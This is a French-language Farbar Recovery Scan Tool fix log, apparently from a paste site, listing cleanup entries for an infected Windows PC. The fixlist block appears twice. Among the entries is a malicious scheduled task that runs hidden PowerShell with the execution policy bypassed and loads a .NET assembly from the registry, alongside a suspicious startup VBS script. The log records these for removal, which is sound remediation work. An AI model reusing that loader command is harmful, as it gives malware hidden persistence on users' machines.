Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 30-01-2022
Exécuté par San (05-02-2022 11:36:34) Run:1
Exécuté depuis C:\Users\VLAD\Downloads
Profils chargés: San
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
start
closeprocesses:
createrestorepoint:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Pas de fichier
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => -> Pas de fichier
AlternateDataStreams: C:\Users\VLAD\Amazon Drive:com.amazon.drive.sync [86]
AlternateDataStreams: C:\Users\VLAD\Amazon Drive:com.amazon.drive.sync.root [42]
HKU\S-1-5-21-934770962-1916739822-3160781104-1000\...\MountPoints2: I - "I:\mSetup.exe"
HKU\S-1-5-21-934770962-1916739822-3160781104-1000\...\Winlogon: [Shell] explorer.exe, <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{26923b43-4d38-484f-9b9e-de460746276c}] -> C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] ->
HKLM\Software\...\Authentication\Credential Providers: [{D28973E5-8630-41af-8831-50A15FEB396B}] ->
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {0B724FEA-5408-4297-852F-9B68D062A74A} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (Pas de fichier)
Task: {1851E3E5-2793-4090-87FB-2F9D9AEF4BCD} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (Pas de fichier)
Task: {1A423620-8F09-480D-A59F-82CF3690CC5D} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (Pas de fichier)
Task: {1CE5D4DB-550A-425B-A956-7F628E7A1E09} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Pas de fichier)
Task: {2394013D-13A9-4D15-BB01-D50F0068442A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (Pas de fichier)
Task: {261D8F34-0C8E-4C2D-A1F5-A75D3587D53E} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (Pas de fichier)
Task: {270B8055-06F3-4A0C-A715-F9A9576AE6E0} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe /StartRecording (Pas de fichier)
Task: {2AB89586-58F2-40A5-8BAD-5ED628AE111D} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {2B4DA130-E737-4BEB-A148-281612399BF8} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (Pas de fichier)
Task: {2CA3E77E-D297-4A85-8D27-F5F71610E5F2} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Pas de fichier)
Task: {2CAA78DE-7F0A-4AFF-8930-51A798972DF1} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (Pas de fichier)
Task: {2DF5CBCB-4AA2-4802-8B33-35884002E515} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (Pas de fichier)
Task: {555F2297-7613-4C42-A720-E57D901639DD} - \Microsoft\Windows\MUI\WindowsUpdate -> Pas de fichier <==== ATTENTION
Task: {706FAD9A-7461-4395-B8D9-73D287EE741F} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (Pas de fichier)
Task: {7491BDA0-21C8-428A-BB0C-1034785B8CC0} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (Pas de fichier)
Task: {7577DA78-486A-4FF1-8E6D-C089C3549FF3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe (Pas de fichier)
Task: {78DB1B2D-356C-43D6-B1A6-F2E5F5B5F8E8} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe /RestartRecording (Pas de fichier)
Task: {87885DA7-1174-462E-B840-344E2CF29793} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (Pas de fichier)
Task: {8804EABB-7ABF-4F35-9D72-0A401568DC57} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (Pas de fichier)
Task: {92201921-F9ED-477A-A5DC-C154710D3293} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (Pas de fichier)
Task: {AF46F29D-D668-4007-BE75-7E156912F3F7} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe (Pas de fichier)
Task: {AFA7BA42-67B6-45CB-9987-2789C1905623} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe $(Arg0) (Pas de fichier)
Task: {CA42C218-EDE9-4A2C-A863-AF7E3AD2D47C} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Pas de fichier)
Task: {CA8CAE48-E135-4520-98C1-358D7C9A0D6E} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (Pas de fichier)
Task: {CC24C5B3-6869-4660-B495-9D9A4117AC1D} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (Pas de fichier)
Task: {D25EBE6B-9765-4B45-8DEB-3802A64802C9} - System32\Tasks\update-S-1-5-21-934770962-1916739822-3160781104-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Pas de fichier)
Task: {D795EAC1-7812-4D83-9E15-3DA40A6FF2D6} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (Pas de fichier)
Task: {D7AC6AF1-6CF9-4082-B074-B95CE8993791} - System32\Tasks\{5CAED238-C662-4E3D-BA32-0BC15DB093D3} => C:\Windows\system32\pcalua.exe -a C:\Users\VLAD\AppData\Local\Temp\jre-8u201-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
Task: {DA75C99C-BA93-49B4-BA0D-5CA59B21C55B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (Pas de fichier)
Task: {EB3C8EA7-42CD-49DC-B38E-D9BE1FFFF21F} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (Pas de fichier)
Task: {EDD91565-E2EB-4950-8B8B-512CBFDB95A7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (Pas de fichier)
Task: {84BFEA20-F978-4C12-B0CB-0DA09708C57C} - System32\Tasks\dying => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\dying\).dying).EntryPoint.Invoke($Null,$Null)
2022-02-03 17:07 - 2022-02-03 17:07 - 000003848 _____ C:\WINDOWS\system32\Tasks\dying
Startup: C:\Users\VLAD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dyinglight2.vbs [2022-02-03] () [Fichier non signé]
CHR HKU\S-1-5-21-934770962-1916739822-3160781104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\VLAD\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx
CHR HKU\S-1-5-21-934770962-1916739822-3160781104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
S4 UcmCxUcsiNvppc; \SystemRoot\System32\DriverStore\FileRepository\nvppc.inf_amd64_25fb711132593303\UcmCxUcsiNvppc.sys [X]
cmd: netsh advfirewall reset
emptytemp:
end
*****************
Exécuté par San (05-02-2022 11:36:34) Run:1
Exécuté depuis C:\Users\VLAD\Downloads
Profils chargés: San
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
start
closeprocesses:
createrestorepoint:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Pas de fichier
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => -> Pas de fichier
AlternateDataStreams: C:\Users\VLAD\Amazon Drive:com.amazon.drive.sync [86]
AlternateDataStreams: C:\Users\VLAD\Amazon Drive:com.amazon.drive.sync.root [42]
HKU\S-1-5-21-934770962-1916739822-3160781104-1000\...\MountPoints2: I - "I:\mSetup.exe"
HKU\S-1-5-21-934770962-1916739822-3160781104-1000\...\Winlogon: [Shell] explorer.exe, <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{26923b43-4d38-484f-9b9e-de460746276c}] -> C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] ->
HKLM\Software\...\Authentication\Credential Providers: [{D28973E5-8630-41af-8831-50A15FEB396B}] ->
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {0B724FEA-5408-4297-852F-9B68D062A74A} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (Pas de fichier)
Task: {1851E3E5-2793-4090-87FB-2F9D9AEF4BCD} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (Pas de fichier)
Task: {1A423620-8F09-480D-A59F-82CF3690CC5D} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (Pas de fichier)
Task: {1CE5D4DB-550A-425B-A956-7F628E7A1E09} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Pas de fichier)
Task: {2394013D-13A9-4D15-BB01-D50F0068442A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (Pas de fichier)
Task: {261D8F34-0C8E-4C2D-A1F5-A75D3587D53E} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (Pas de fichier)
Task: {270B8055-06F3-4A0C-A715-F9A9576AE6E0} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe /StartRecording (Pas de fichier)
Task: {2AB89586-58F2-40A5-8BAD-5ED628AE111D} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {2B4DA130-E737-4BEB-A148-281612399BF8} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (Pas de fichier)
Task: {2CA3E77E-D297-4A85-8D27-F5F71610E5F2} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Pas de fichier)
Task: {2CAA78DE-7F0A-4AFF-8930-51A798972DF1} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (Pas de fichier)
Task: {2DF5CBCB-4AA2-4802-8B33-35884002E515} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (Pas de fichier)
Task: {555F2297-7613-4C42-A720-E57D901639DD} - \Microsoft\Windows\MUI\WindowsUpdate -> Pas de fichier <==== ATTENTION
Task: {706FAD9A-7461-4395-B8D9-73D287EE741F} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (Pas de fichier)
Task: {7491BDA0-21C8-428A-BB0C-1034785B8CC0} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (Pas de fichier)
Task: {7577DA78-486A-4FF1-8E6D-C089C3549FF3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe (Pas de fichier)
Task: {78DB1B2D-356C-43D6-B1A6-F2E5F5B5F8E8} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe /RestartRecording (Pas de fichier)
Task: {87885DA7-1174-462E-B840-344E2CF29793} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (Pas de fichier)
Task: {8804EABB-7ABF-4F35-9D72-0A401568DC57} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (Pas de fichier)
Task: {92201921-F9ED-477A-A5DC-C154710D3293} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (Pas de fichier)
Task: {AF46F29D-D668-4007-BE75-7E156912F3F7} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe (Pas de fichier)
Task: {AFA7BA42-67B6-45CB-9987-2789C1905623} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe $(Arg0) (Pas de fichier)
Task: {CA42C218-EDE9-4A2C-A863-AF7E3AD2D47C} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Pas de fichier)
Task: {CA8CAE48-E135-4520-98C1-358D7C9A0D6E} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (Pas de fichier)
Task: {CC24C5B3-6869-4660-B495-9D9A4117AC1D} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (Pas de fichier)
Task: {D25EBE6B-9765-4B45-8DEB-3802A64802C9} - System32\Tasks\update-S-1-5-21-934770962-1916739822-3160781104-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Pas de fichier)
Task: {D795EAC1-7812-4D83-9E15-3DA40A6FF2D6} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (Pas de fichier)
Task: {D7AC6AF1-6CF9-4082-B074-B95CE8993791} - System32\Tasks\{5CAED238-C662-4E3D-BA32-0BC15DB093D3} => C:\Windows\system32\pcalua.exe -a C:\Users\VLAD\AppData\Local\Temp\jre-8u201-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
Task: {DA75C99C-BA93-49B4-BA0D-5CA59B21C55B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (Pas de fichier)
Task: {EB3C8EA7-42CD-49DC-B38E-D9BE1FFFF21F} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (Pas de fichier)
Task: {EDD91565-E2EB-4950-8B8B-512CBFDB95A7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (Pas de fichier)
Task: {84BFEA20-F978-4C12-B0CB-0DA09708C57C} - System32\Tasks\dying => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\dying\).dying).EntryPoint.Invoke($Null,$Null)
2022-02-03 17:07 - 2022-02-03 17:07 - 000003848 _____ C:\WINDOWS\system32\Tasks\dying
Startup: C:\Users\VLAD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dyinglight2.vbs [2022-02-03] () [Fichier non signé]
CHR HKU\S-1-5-21-934770962-1916739822-3160781104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\VLAD\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx
CHR HKU\S-1-5-21-934770962-1916739822-3160781104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
S4 UcmCxUcsiNvppc; \SystemRoot\System32\DriverStore\FileRepository\nvppc.inf_amd64_25fb711132593303\UcmCxUcsiNvppc.sys [X]
cmd: netsh advfirewall reset
emptytemp:
end
*****************